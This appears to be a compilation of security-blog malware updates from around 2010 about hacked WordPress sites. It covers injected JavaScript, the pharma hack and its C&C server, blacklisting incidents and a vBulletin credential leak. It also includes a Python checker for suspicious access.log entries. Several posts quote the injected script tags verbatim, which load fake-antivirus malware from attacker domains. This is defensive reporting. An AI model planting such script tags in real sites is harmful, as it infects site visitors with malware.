Malware update – Alex Bodrov – awaue.com,etc

We will be posting some quick malware updates on our blog from now on. The latest one, which is affecting quite a few sites, is malicious JavaScript being injected directly into the wp_posts table of WordPress sites. These are the domains being used:

http://aeaaea.com/ou

http://secree.com/re

http://uoauer.com/si

http://oeooea.com/ve

http://secowo.com/wo

Those were used in the first batch of attacks that happened a few weeks (months) ago:

http://ae.awaue.com

http://ie.eracou.com

http://ao.euuaw.com

Details about the malware:
http://sucuri.net/malware/entry/MW:RKS:3

For hosting providers/security companies: Block the IP address 91.188.59.203 – (it is hosting all those sites).


Hilary Kneber (part XI) – sippa.dottasink.net

Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:

<script src="http://sippa.dottasink.net/music/indi.php"></script>

This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the well-known "fake AV" malware is offered to them.

And guess who registered that domain?


More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is that all of them have been controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:



Gmail blacklisted by Spamhaus

Update: Gmail not blacklisted anymore.

It seems that today Spamhaus (a widely used spam blacklist) started to blacklist the IP addresses used by Gmail. We got this notification from our blacklist monitor:

< OK: Host www.gmail.com clean.

> WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21
> WARN: Host www.gmail.com blacklisted.

Digging further:

$ host gmail.com
gmail.com has address 74.125.227.24
gmail.com has address 74.125.227.21
gmail.com has address 74.125.227.22
gmail.com has address 74.125.227.23



Pharma hack and their C&C (Command & control) server

A large portion of the sites Sucuri has been fixing in recent weeks have been infected by the infamous Pharma Hack. We posted a detailed document explaining how to identify and clean it:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 - - [31/Jul/2010:06:07:59 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 374 "-" "-"
94.76.241.4 - - [31/Jul/2010:06:08:30 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 447 "-" "-"
94.76.241.4 - - [31/Jul/2010:11:06:55 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 444 "-" "-"
94.76.241.4 - - [30/Jul/2010:12:57:41 -0700] "POST /wp-content/themes/classic/comments.php HTTP/1.1" 200 202 "-" "-"
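A small checker for the access.log pattern described above, added here as an example (it is not Sucuri's tooling). It parses combined-format lines and flags POST requests from the C&C address named in the post that go straight to a PHP file under wp-content/themes with an empty referer and user agent, as in the entries shown; the log lines in the script are constructed samples, not a real capture.

```python
import re

# Constructed sample access.log (not a real capture): the 94.76.241.4 lines
# mirror the pattern from the post, the other two are benign background noise.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Jul/2010:06:05:12 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
94.76.241.4 - - [31/Jul/2010:06:07:59 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 374 "-" "-"
94.76.241.4 - - [31/Jul/2010:06:08:30 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 447 "-" "-"
198.51.100.9 - - [31/Jul/2010:07:00:01 -0700] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://example.test/" "Mozilla/5.0"
94.76.241.4 - - [30/Jul/2010:12:57:41 -0700] "POST /wp-content/themes/classic/comments.php HTTP/1.1" 200 202 "-" "-"
"""

CC_IPS = {"94.76.241.4"}  # the command-and-control address named in the post

# Apache/nginx "combined" log format: ip ident user [ts] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious(entry):
    """True for the pattern in the post: the C&C IP POSTing directly to a theme
    PHP file (a backdoor drop point), with no referer and no user agent."""
    if entry is None or entry["ip"] not in CC_IPS:
        return False
    direct_to_theme = entry["method"] == "POST" and entry["path"].startswith("/wp-content/themes/")
    blank_client = entry["referer"] == "-" and entry["ua"] == "-"
    return direct_to_theme and blank_client

def scan_log(text):
    """Return (ip, timestamp, path, status) for every suspicious line in the log text."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if is_suspicious(entry):
            hits.append((entry["ip"], entry["ts"], entry["path"], int(entry["status"])))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Point scan_log at the contents of a real access.log to list the matching requests; a 500 on the theme file usually means the injected PHP was removed or never executed, while a 200 means the request was served.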

This IP is hosted at Blueconnex, and even after numerous abuse reports (from multiple sources), they have sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550



Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group

If you have been following our blog for a while, you have probably heard about quite a few large-scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc.

The new one that started to spread today uses a JavaScript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it loads www4.meowmeow4.co.cc and then offers the well-known "fake AV" malware to the end user of the site. This is how it looks on a site:

< script src =" http://vancouvererrorsonfile.com/js2.php

Or in our scanner (blueh2):


Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)

Recently we started to see a lot of WordPress sites hacked with malware hidden inside the siteurlpath entry of the wp_options table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case the SPAM is displayed to all users, not only to search engines.

This is how an affected site looks on our scanner:



UFC.com blacklisted by Google (indirectly)

Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google:

UFC.com blacklisted

Warning: Visiting this site may harm your computer!
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

They are being blacklisted indirectly because they load content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for hosting malware.

As far as Clearspring is concerned, it seems they have been hacked and the attacker has added malicious code that loads malware from semaniseme.com and wenmo.in. So there are multiple levels of indirection here before UFC.com users are affected.

Anyone else using Clearspring should remove its code from their sites until Clearspring has this blacklist issue sorted out.

To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.


Vulnerability in Vbulletin 3.8.6

If you are running vBulletin 3.8.6 (the latest 3.8.x version), make sure to remove faq.php as soon as possible. A vulnerability has been found that allows anyone to retrieve the database credentials through it.

The VBSEO team was quick to react and sent the following note to their clients a little while ago:

Hello valued vBSEO customer,

It has come to our attention that a vulnerability on vBulletin 3.8.6
has been discovered. The exploit allows a malicious user to retrieve a
forum’s database credentials via the faq.php script.

If you are running vBulletin 3.8.6, we strongly recommend that you
remove the faq.php script and change your mysql database details as a
precaution.

You can find faq.php in your vBulletin installation directory:
*/vbroot/faq.php

Update: Patch available here.

It seems that a patch is coming very soon too. Some discussion about this issue here. Thanks to Marcus Maciel for the heads up.


Yet another series of attacks – This time using whereisdudescars.com

Update 1: It seems that this attack is limited to only Bluehost and Dreamhost, not GoDaddy like in the previous times.
Update 2: This script should fix/clean an infected site: site fix.php
Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com as well.

We're tracking another series of attacks affecting many web sites (WordPress seems to be the target application so far). This time they're using whereisdudescars.com as the attacking site and adding the following JavaScript to the web sites:

<script src=" http://whereisdudescars.com/js2.php"></script>

<script src=" http://nowisisdudescars.com/js.php

This code then loads another JavaScript file from http://www4.realprotection36.co.cc that attempts to push the "fake antivirus" malware onto visitors of the site.
